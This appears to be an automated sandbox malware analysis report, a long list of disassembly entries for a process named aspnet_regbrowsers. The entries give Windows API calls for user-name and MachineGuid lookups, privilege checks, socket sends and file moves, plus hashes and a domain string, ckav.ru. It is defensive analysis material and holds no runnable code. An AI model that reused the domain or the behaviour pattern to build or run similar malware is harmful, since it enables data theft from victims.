                                                                                              • Opcode ID: b52d99f42f68723aef5fd834f3fc6c8fdb7b2d5b4e411be9fbae0770ffe78be6
                                                                                              • Instruction ID: 60e70a0f6cedc7b52d1efda55ce7422740d02a59a4e71dca7f773cbcdc95941a
                                                                                              • Opcode Fuzzy Hash: b52d99f42f68723aef5fd834f3fc6c8fdb7b2d5b4e411be9fbae0770ffe78be6
                                                                                              • Instruction Fuzzy Hash: 2F014F315021343AD6356A679C0EEEF6D5DDF8B6B5F10422AFA18B60D0EA755B0181F8
                                                                                              APIs
                                                                                              • CreateThread.KERNELBASE(00000000,00000000,0041289A,00000000,00000000,?,00000000,FCAE4162,00000000,00000000,?,?,?,?,00000001,00000000), ref: 00412F53
                                                                                                • Part of subcall function 0040632F: _wmemset.LIBCMT ref: 0040634F
                                                                                                • Part of subcall function 00402BAB: GetProcessHeap.KERNEL32(00000000,00000000), ref: 00402BB9
                                                                                                • Part of subcall function 00402BAB: HeapFree.KERNEL32(00000000), ref: 00402BC0
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.665835166.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_400000_aspnet_regbrowsers.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: Heap$CreateFreeProcessThread_wmemset
                                                                                              • String ID: ckav.ru
                                                                                              • API String ID: 2915393847-2696028687
                                                                                              • Opcode ID: eacd1f59d46a33f08cf175cca3b3b274a2abcb1d178fb3fa8030531899280e62
                                                                                              • Instruction ID: 4531c2d42d5f5f74382d08a8027233dc497c0745a20cb628f46216a694decd77
                                                                                              • Opcode Fuzzy Hash: eacd1f59d46a33f08cf175cca3b3b274a2abcb1d178fb3fa8030531899280e62
                                                                                              • Instruction Fuzzy Hash: 7751B7728005047EEA113B62DD4ADEB3669EB2034CB54423BFC06B51B2E67A4D74DBED
                                                                                              APIs
                                                                                                • Part of subcall function 00402B7C: GetProcessHeap.KERNEL32(00000000,?,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E), ref: 00402B85
                                                                                                • Part of subcall function 00402B7C: RtlAllocateHeap.NTDLL(00000000,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E,00000000), ref: 00402B8C
                                                                                              • _wmemset.LIBCMT ref: 0040634F
                                                                                                • Part of subcall function 00406069: GetUserNameW.ADVAPI32(?,?,00000009,D4449184,00000000,00000000,?,00406361,00000000,CA,00000000,00000000,00000104,00000000,00000032), ref: 00406082
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.665835166.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_400000_aspnet_regbrowsers.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: Heap$AllocateNameProcessUser_wmemset
                                                                                              • String ID: CA
                                                                                              • API String ID: 2078537776-1052703068
                                                                                              • Opcode ID: a8ac9dcd0bdef4118ea85f480caa20ceae6cf91017b4610bad34c656c12023a0
                                                                                              • Instruction ID: fc433e2548431d42ded6bbe1dab57db4bffb986d933035261d01f02eae51e62b
                                                                                              • Opcode Fuzzy Hash: a8ac9dcd0bdef4118ea85f480caa20ceae6cf91017b4610bad34c656c12023a0
                                                                                              • Instruction Fuzzy Hash: 0FE09B62A4511477D121A9665C06EAF76AC8F41B64F11017FFC05B62C1E9BC9E1101FD
                                                                                              APIs
                                                                                              • SHRegSetPathW.SHLWAPI(00000000,?,00000000,-80000001,00412D05,00000002,EBB783D2,00000000,00000000,5,A,00412D05,-80000001,00000000,5,A,00000000,00000000), ref: 0041286C
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.665835166.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_400000_aspnet_regbrowsers.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: Path
                                                                                              • String ID: 5,A
                                                                                              • API String ID: 2875597873-3842761921
                                                                                              • Opcode ID: 985f833e562fc410bf8876cb62ef75c9432edfe987e4e1d4c2e5d722ffee7efc
                                                                                              • Instruction ID: e513a9aa1dc03f827004651369457c754081445531a40a51076ab4492d9af12d
                                                                                              • Opcode Fuzzy Hash: 985f833e562fc410bf8876cb62ef75c9432edfe987e4e1d4c2e5d722ffee7efc
                                                                                              • Instruction Fuzzy Hash: 48D0C93214020DBBDF026EC1DC02F9A3F2AAB48754F004014BB18280A1D6B3A630ABA9
                                                                                              APIs
                                                                                              • GetTokenInformation.KERNELBASE(?,00000000,00000001,?,004062B4,00000009,ECAE3497,00000000,00000000,IDA,004062B4,IDA,00000001,00000000,?,?), ref: 004060A8
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.665835166.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_400000_aspnet_regbrowsers.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: InformationToken
                                                                                              • String ID: IDA
                                                                                              • API String ID: 4114910276-365204570
                                                                                              • Opcode ID: 947dba5d192e13df99ca19526492baac9a77df32751a8a878116f3f8cb9ab45e
                                                                                              • Instruction ID: 313645685f6ff1854c13b9bf72d10cc52e042395484f5c11e0c3c7a214e99d66
                                                                                              • Opcode Fuzzy Hash: 947dba5d192e13df99ca19526492baac9a77df32751a8a878116f3f8cb9ab45e
                                                                                              • Instruction Fuzzy Hash: F4D0C93214020DBFEF025EC1DC02F993F2AAB08754F008410BB18280E1D6B39670AB95
                                                                                              APIs
                                                                                              • GetProcAddress.KERNELBASE(?,s1@,00000000,CEB18ABC,00000000,00000000,?,00403173,?,00000000), ref: 00402C1B
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.665835166.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_400000_aspnet_regbrowsers.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: AddressProc
                                                                                              • String ID: s1@
                                                                                              • API String ID: 190572456-427247929
                                                                                              • Opcode ID: 111d3fe3cf3de278b88478875a5240f52c9cc91b538b26207c7303d9e6a3f6a3
                                                                                              • Instruction ID: 1fbf97b0b55819c82851c7ea3a697f1c0796d20c97a22cfecd58a5260392007e
                                                                                              • Opcode Fuzzy Hash: 111d3fe3cf3de278b88478875a5240f52c9cc91b538b26207c7303d9e6a3f6a3
                                                                                              • Instruction Fuzzy Hash: A5C048B10142087EAE016EE19C05CBB3F5EEA44228B008429BD18E9122EA3ADE2066A4
                                                                                              APIs
                                                                                                • Part of subcall function 00402B7C: GetProcessHeap.KERNEL32(00000000,?,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E), ref: 00402B85
                                                                                                • Part of subcall function 00402B7C: RtlAllocateHeap.NTDLL(00000000,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E,00000000), ref: 00402B8C
                                                                                              • RegOpenKeyExA.KERNEL32(00000032,?,00000000,00020119,00000000,00000009,F4B4ACDC,00000000,00000000,MachineGuid,00000032,00000000,00413DA5,00413987), ref: 00404A9A
                                                                                              • RegQueryValueExA.KERNEL32(?,00000000,00000000,00000000,00000000,00000009,00000009,FE9F661A,00000000,00000000), ref: 00404ABC
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.665835166.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_400000_aspnet_regbrowsers.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: Heap$AllocateOpenProcessQueryValue
                                                                                              • String ID:
                                                                                              • API String ID: 1425999871-0
                                                                                              • Opcode ID: cde82c20d06cc90513d2926ae88c3b2314f77feeb194b7ecfbb340b9f5de6e47
                                                                                              • Instruction ID: c751ae4fb1a51baa23b068920df28fa5e45e9ad9ad003da97b765f6d6e9ada80
                                                                                              • Opcode Fuzzy Hash: cde82c20d06cc90513d2926ae88c3b2314f77feeb194b7ecfbb340b9f5de6e47
                                                                                              • Instruction Fuzzy Hash: A301B1B264010C7EEB01AED69C86DBF7B2DDB81798B10003EF60475182EAB59E1156B9
                                                                                              APIs
                                                                                              • CheckTokenMembership.KERNELBASE(00000000,00000000,00000000,00000009,E3B938DF,00000000,00000000,00000001), ref: 00406115
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.665835166.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_400000_aspnet_regbrowsers.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: CheckMembershipToken
                                                                                              • String ID:
                                                                                              • API String ID: 1351025785-0
                                                                                              • Opcode ID: 4a43c4ed47dff20a0e63da0344eb6b70d0e7b4795f78c2e23bdd5dfdab477f71
                                                                                              • Instruction ID: 8b780b9e56efd5f2a9a2252a5f210822aeafba94d0ba5a8497d60ad8274f78a0
                                                                                              • Opcode Fuzzy Hash: 4a43c4ed47dff20a0e63da0344eb6b70d0e7b4795f78c2e23bdd5dfdab477f71
                                                                                              • Instruction Fuzzy Hash: 7801867195020DBEEB00EBE59C86EFFB77CEF08208F100569B515B60C2EA75AF008764
                                                                                              APIs
                                                                                                • Part of subcall function 00402B7C: GetProcessHeap.KERNEL32(00000000,?,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E), ref: 00402B85
                                                                                                • Part of subcall function 00402B7C: RtlAllocateHeap.NTDLL(00000000,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E,00000000), ref: 00402B8C
                                                                                              • SHQueryValueExW.SHLWAPI(?,?,00000000,00000000,00000000,00000208,00000002,C170F4F3,00000000,00000000), ref: 00404C35
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.665835166.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_400000_aspnet_regbrowsers.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: Heap$AllocateProcessQueryValue
                                                                                              • String ID:
                                                                                              • API String ID: 3318767951-0
                                                                                              • Opcode ID: d2beadab3bee545cf5c60f8980fe712c5f4b0e5d6cba08d7b965a56316f6b4bd
                                                                                              • Instruction ID: 79155844af0806bdf0c3860b022b506ec09407af8f096f74cdf457618d2260c4
                                                                                              • Opcode Fuzzy Hash: d2beadab3bee545cf5c60f8980fe712c5f4b0e5d6cba08d7b965a56316f6b4bd
                                                                                              • Instruction Fuzzy Hash: 16F0247290611436E7206E578E0DCAF7F3CCBC3B25B01003EF908B61C0DAB99A0181B8
                                                                                              APIs
                                                                                                • Part of subcall function 00402B7C: GetProcessHeap.KERNEL32(00000000,?,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E), ref: 00402B85
                                                                                                • Part of subcall function 00402B7C: RtlAllocateHeap.NTDLL(00000000,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E,00000000), ref: 00402B8C
                                                                                              • SHGetFolderPathW.SHELL32(00000000,0000001A,00000000,00000000,00000000,0000000A,C7F71852,00000000,00000000,00413CAD,0000001A,00000001), ref: 0040408F
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.665835166.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_400000_aspnet_regbrowsers.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: Heap$AllocateFolderPathProcess
                                                                                              • String ID:
                                                                                              • API String ID: 398210565-0
                                                                                              • Opcode ID: 5a4567249377e1c5aacc7f09cc20ffc60836f4584ead4ee4f677cdbbf549426b
                                                                                              • Instruction ID: 7d0b33caadbb1370849e9dfd1ecad86b360ac2e9a1dca59c17201c727c4e1007
                                                                                              • Opcode Fuzzy Hash: 5a4567249377e1c5aacc7f09cc20ffc60836f4584ead4ee4f677cdbbf549426b
                                                                                              • Instruction Fuzzy Hash: 57E06D6260156136D23129A7AC09D6B6E7DCBD3FA5B00003FF708F52C1D96D990281BA
                                                                                              APIs
                                                                                              • CreateDirectoryW.KERNELBASE(00413D1F,00000000,00000000,C8F0A74D,00000000,00000000,00000000,?,00413D1F,00000000), ref: 00403C8B
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.665835166.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_400000_aspnet_regbrowsers.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: CreateDirectory
                                                                                              • String ID:
                                                                                              • API String ID: 4241100979-0
                                                                                              • Opcode ID: d413ab25134c4b1c761ae7c40b175d3f6038492197e92d4c0305fa2d5b60993a
                                                                                              • Instruction ID: 8def336d827aa123259dd30fe2d1f4df156212ecddfe904d71fbacf529eca846
                                                                                              • Opcode Fuzzy Hash: d413ab25134c4b1c761ae7c40b175d3f6038492197e92d4c0305fa2d5b60993a
                                                                                              • Instruction Fuzzy Hash: 47D05E320450687A9A202AA7AC08CDB3E0DDE032FA7004036B81CE4052DB26861191E4
                                                                                              APIs
                                                                                              • GetNativeSystemInfo.KERNEL32(?,00000000,E9AF4586,00000000,00000000,?,?,?,?,004144CF,00000000,00000000,00000000,00000000), ref: 00406445
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.665835166.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_400000_aspnet_regbrowsers.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: InfoNativeSystem
                                                                                              • String ID:
                                                                                              • API String ID: 1721193555-0
                                                                                              • Opcode ID: 18b792e9f3ed795f2423495cf2abf5b642ecf28d7d26812d11fe043f37d9eb75
                                                                                              • Instruction ID: 89a273ea7bbabd9d74fc824e7d15e3b55fbc967ee531cdb223f62f0d5b23fb21
                                                                                              • Opcode Fuzzy Hash: 18b792e9f3ed795f2423495cf2abf5b642ecf28d7d26812d11fe043f37d9eb75
                                                                                              • Instruction Fuzzy Hash: 60D0C9969142082A9B24FEB14E49CBB76EC9A48104B400AA8FC05E2180FD6ADF5482A5
                                                                                              APIs
                                                                                              • GetPrivateProfileStringW.KERNEL32(?,?,?,?,?,?,00000000,F66BE5A2,00000000,00000000), ref: 004044CB
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.665835166.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_400000_aspnet_regbrowsers.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: PrivateProfileString
                                                                                              • String ID:
                                                                                              • API String ID: 1096422788-0
                                                                                              • Opcode ID: 4d7b33c0f443fd34e1b412248ee3a3a873a37a73c8fd0d440c03b52d081651e8
                                                                                              • Instruction ID: e6a1e737d40be81796f932fb1ea6dd5b05bd2579ff383e5fb5a00b3a8c54de51
                                                                                              • Opcode Fuzzy Hash: 4d7b33c0f443fd34e1b412248ee3a3a873a37a73c8fd0d440c03b52d081651e8
                                                                                              • Instruction Fuzzy Hash: 52D0C27604410DBFDF025EE1DC05CAB3F6EEB48354B408425BE2895021D637DA71ABA5
                                                                                              APIs
                                                                                              • SHGetValueW.SHLWAPI(?,?,?,?,?,?,00000002,DC1011D7,00000000,00000000), ref: 004049D8
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.665835166.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_400000_aspnet_regbrowsers.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: Value
                                                                                              • String ID:
                                                                                              • API String ID: 3702945584-0
                                                                                              • Opcode ID: d2b5c774d03033d136a946971d24419cad296dffbc8af53813a044fec6ac893d
                                                                                              • Instruction ID: 49132b90e07f175002bb52db16c83daeb6fc20f74050e769a3614ef6a11dfcc0
                                                                                              • Opcode Fuzzy Hash: d2b5c774d03033d136a946971d24419cad296dffbc8af53813a044fec6ac893d
                                                                                              • Instruction Fuzzy Hash: 71D0923214020DBBDF026ED1DC02FAA3F2AAB09758F104014FB18280A1C677D631AB95
                                                                                              APIs
                                                                                              • send.WS2_32(00000000,00000000,00000000,00000000), ref: 00404F07
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.665835166.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_400000_aspnet_regbrowsers.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: send
                                                                                              • String ID:
                                                                                              • API String ID: 2809346765-0
                                                                                              • Opcode ID: f5f37575630baef1eb429ccea87373dc8bd2737f5fb4b11d46726e1bb86e5636
                                                                                              • Instruction ID: 973ad19c2726000f66dbac5dad6f1ecaf56acd36cc9bde1755ab86a88c27f217
                                                                                              • Opcode Fuzzy Hash: f5f37575630baef1eb429ccea87373dc8bd2737f5fb4b11d46726e1bb86e5636
                                                                                              • Instruction Fuzzy Hash: F8D09231140209BBEF016E55EC05BAA3B69EF44B54F10C026BA18991A1DB31A9219A98
                                                                                              APIs
                                                                                              • SHEnumKeyExW.SHLWAPI(?,?,?,?,00000002,ECA4834B,00000000,00000000), ref: 004049FB
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.665835166.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_400000_aspnet_regbrowsers.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: Enum
                                                                                              • String ID:
                                                                                              • API String ID: 2928410991-0
                                                                                              • Opcode ID: c447628955f84b1dbba2996d5b83f9d73ffd86954af03f25284de3baf63e54d0
                                                                                              • Instruction ID: fb20b8ae34c3d99b6a2ec1f59af3280c7c0bbdac25ffdbb9458fe1f208d0831b
                                                                                              • Opcode Fuzzy Hash: c447628955f84b1dbba2996d5b83f9d73ffd86954af03f25284de3baf63e54d0
                                                                                              • Instruction Fuzzy Hash: 45D0023114430D7BEF115ED1DC06F597F1ABB49B54F104455BB18680E19673A6305755
                                                                                              APIs
                                                                                              • MoveFileExW.KERNEL32(00000000,00412C16,?,00000000,C9143177,00000000,00000000,?,004040B6,00000000,00412C16,00000001,?,00412C16,00000000,00000000), ref: 00403BEB
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.665835166.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_400000_aspnet_regbrowsers.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: FileMove
                                                                                              • String ID:
                                                                                              • API String ID: 3562171763-0
                                                                                              • Opcode ID: 7a0bb135e6e1f0606704ed46507384a8cac74e7a8e8860f1f6d7d5715d4ca302
                                                                                              • Instruction ID: 27267517ebbd606c040c475238707358b0366275ca1c9c11413b547716cf2561
                                                                                              • Opcode Fuzzy Hash: 7a0bb135e6e1f0606704ed46507384a8cac74e7a8e8860f1f6d7d5715d4ca302
                                                                                              • Instruction Fuzzy Hash: 5AC04C7500424C7FEF026EF19D05C7B3F5EEB49618F448825BD18D5421DA37DA216664
                                                                                              APIs
                                                                                              • WSAStartup.WS2_32(00000202,?), ref: 00404E08
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.665835166.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_400000_aspnet_regbrowsers.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: Startup
                                                                                              • String ID:
                                                                                              • API String ID: 724789610-0
                                                                                              • Opcode ID: aec8cb7098972fa6752499418e154eb0e8b54166df737fc870e0652f0f0fb75e
                                                                                              • Instruction ID: edfb6e6a7b2c2d2c81179f298452045bbfcf768a57aceb16f5d93ae35c4528ea
                                                                                              • Opcode Fuzzy Hash: aec8cb7098972fa6752499418e154eb0e8b54166df737fc870e0652f0f0fb75e
                                                                                              • Instruction Fuzzy Hash: 6EC08C32AA421C9FD750AAB8AD0FAF0B7ACD30AB02F0002B56E1DC60C1E550582906E2
                                                                                              APIs
                                                                                              • SetFileAttributesW.KERNELBASE(00000000,00002006,00000000,CAC5886E,00000000,00000000,?,00412C3B,00000000,00000000,?), ref: 00404297
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.665835166.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_400000_aspnet_regbrowsers.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: AttributesFile
                                                                                              • String ID:
                                                                                              • API String ID: 3188754299-0
                                                                                              • Opcode ID: 8dd52a8075b7bef316d0fc581140073ef821e073e46509cdb91d5efed9f2b539
                                                                                              • Instruction ID: e837d3b0865cda380a04769d40cc561620ee701a25bf2a33446201ee5459e2a9
                                                                                              • Opcode Fuzzy Hash: 8dd52a8075b7bef316d0fc581140073ef821e073e46509cdb91d5efed9f2b539
                                                                                              • Instruction Fuzzy Hash: A9C092B054430C3EFA102EF29D4AD3B3A8EEB41648B008435BE08E9096E977DE2061A8
                                                                                              APIs
                                                                                              • RegOpenKeyW.ADVAPI32(?,?,?,00000009,DB552DA5,00000000,00000000), ref: 00404A35
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.665835166.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_400000_aspnet_regbrowsers.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: Open
                                                                                              • String ID:
                                                                                              • API String ID: 71445658-0
                                                                                              • Opcode ID: 878e79dc60d56a32ccce77cf818dc40cd176942d244c38d6301a2c771aeba921
                                                                                              • Instruction ID: b1d3f25f69c2166d3d07fcddbc0993e3b6974a4a806b5379996ceb22213e89af
                                                                                              • Opcode Fuzzy Hash: 878e79dc60d56a32ccce77cf818dc40cd176942d244c38d6301a2c771aeba921
                                                                                              • Instruction Fuzzy Hash: 5BC012311802087FFF012EC1CC02F483E1AAB08B55F044011BA18280E1EAB3A2205658
                                                                                              APIs
                                                                                              • DeleteFileW.KERNELBASE(?,00000000,DEAA357B,00000000,00000000), ref: 00403C1D
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.665835166.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_400000_aspnet_regbrowsers.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: DeleteFile
                                                                                              • String ID:
                                                                                              • API String ID: 4033686569-0
                                                                                              • Opcode ID: 01b23650ea3b3ad0b7ef3e64b7b20365c040140a899dd4cba48e3dfa7394e9f1
                                                                                              • Instruction ID: 5639c68ad781144a2d68ff400f656d3d2c658e81fc8059c2e96e04b5885f7932
                                                                                              • Opcode Fuzzy Hash: 01b23650ea3b3ad0b7ef3e64b7b20365c040140a899dd4cba48e3dfa7394e9f1
                                                                                              • Instruction Fuzzy Hash: EDB092B04082093EAA013EF59C05C3B3E4DDA4010870048257D08E6111EA36DF1010A8
                                                                                              APIs
                                                                                              • LoadLibraryW.KERNEL32(?,00000000,E811E8D4,00000000,00000000), ref: 00402C34
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.665835166.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_400000_aspnet_regbrowsers.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: LibraryLoad
                                                                                              • String ID:
                                                                                              • API String ID: 1029625771-0
                                                                                              • Opcode ID: af34b662912c89fdb3a0f1b9ff73cd040c3e05ef601eeab43baa4f39a88cbda5
                                                                                              • Instruction ID: cd53f9395925d29cf68d66af6aae64644fca58afce9bbcd5edfe8b9605b00cd0
                                                                                              • Opcode Fuzzy Hash: af34b662912c89fdb3a0f1b9ff73cd040c3e05ef601eeab43baa4f39a88cbda5
                                                                                              • Instruction Fuzzy Hash: C9B092B00082083EAA002EF59C05C7F3A4DDA4410874044397C08E5411F937DE1012A5
                                                                                              APIs
                                                                                              • FreeLibrary.KERNELBASE(?,00000000,E0CF5891,00000000,00000000), ref: 00408B41
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.665835166.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_400000_aspnet_regbrowsers.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: FreeLibrary
                                                                                              • String ID:
                                                                                              • API String ID: 3664257935-0
                                                                                              • Opcode ID: 450bda5b085385e41399d185e0c6d92315b9743f5e19a8ad8642e29fe69941a3
                                                                                              • Instruction ID: 291ca984118c00001a410e8fe814b9ebecee15bf7cc635df9db1cfcd8d33b31d
                                                                                              • Opcode Fuzzy Hash: 450bda5b085385e41399d185e0c6d92315b9743f5e19a8ad8642e29fe69941a3
                                                                                              • Instruction Fuzzy Hash: 0EB092B004820C3EAE002EF19C05C3B3E8DEA4454870044757E0CE5051EA36DE1110A5
                                                                                              APIs
                                                                                              • FindClose.KERNELBASE(00403F8D,00000000,DA6AE59A,00000000,00000000,?,00403F8D,00000000), ref: 00403C04
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.665835166.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_400000_aspnet_regbrowsers.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: CloseFind
                                                                                              • String ID:
                                                                                              • API String ID: 1863332320-0
                                                                                              • Opcode ID: 9873c53fda05388afb850746851f5e32e8254642b63e91831ef49aacf0f87411
                                                                                              • Instruction ID: 1ebc74916e7009c76bd4f38d62a0f1d2d6d24e136e2668fcc01a71b48f24aa02
                                                                                              • Opcode Fuzzy Hash: 9873c53fda05388afb850746851f5e32e8254642b63e91831ef49aacf0f87411
                                                                                              • Instruction Fuzzy Hash: FDB092B00442087EEE002EF1AC05C7B3F4EDA4410970044257E0CE5012E937DF1010B4
                                                                                              APIs
                                                                                              • GetFileAttributesW.KERNELBASE(00413D1F,00000000,C6808176,00000000,00000000,?,00403D58,00413D1F,?,00403C6D,00413D1F,?,00413D1F,00000000), ref: 00403BCC
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.665835166.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_400000_aspnet_regbrowsers.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: AttributesFile
                                                                                              • String ID:
                                                                                              • API String ID: 3188754299-0
                                                                                              • Opcode ID: 1d6dd25f7c332fd1d35fbf5985813ee51de81cf8f6e5d0f963c2f0c9ec148b39
                                                                                              • Instruction ID: 12c622a32f4ce0ce5baf48af10e49973588d22e73ecb696d4958cc4f11b8a016
                                                                                              • Opcode Fuzzy Hash: 1d6dd25f7c332fd1d35fbf5985813ee51de81cf8f6e5d0f963c2f0c9ec148b39
                                                                                              • Instruction Fuzzy Hash: D2B092B05042083EAE012EF19C05C7B3A6DCA40148B4088297C18E5111ED36DE5050A4
                                                                                              APIs
                                                                                              • RegCloseKey.KERNEL32(00000000,00000009,D980E875,00000000,00000000,?,00404A44,?,?,00404AC6,?), ref: 00404A15
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.665835166.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
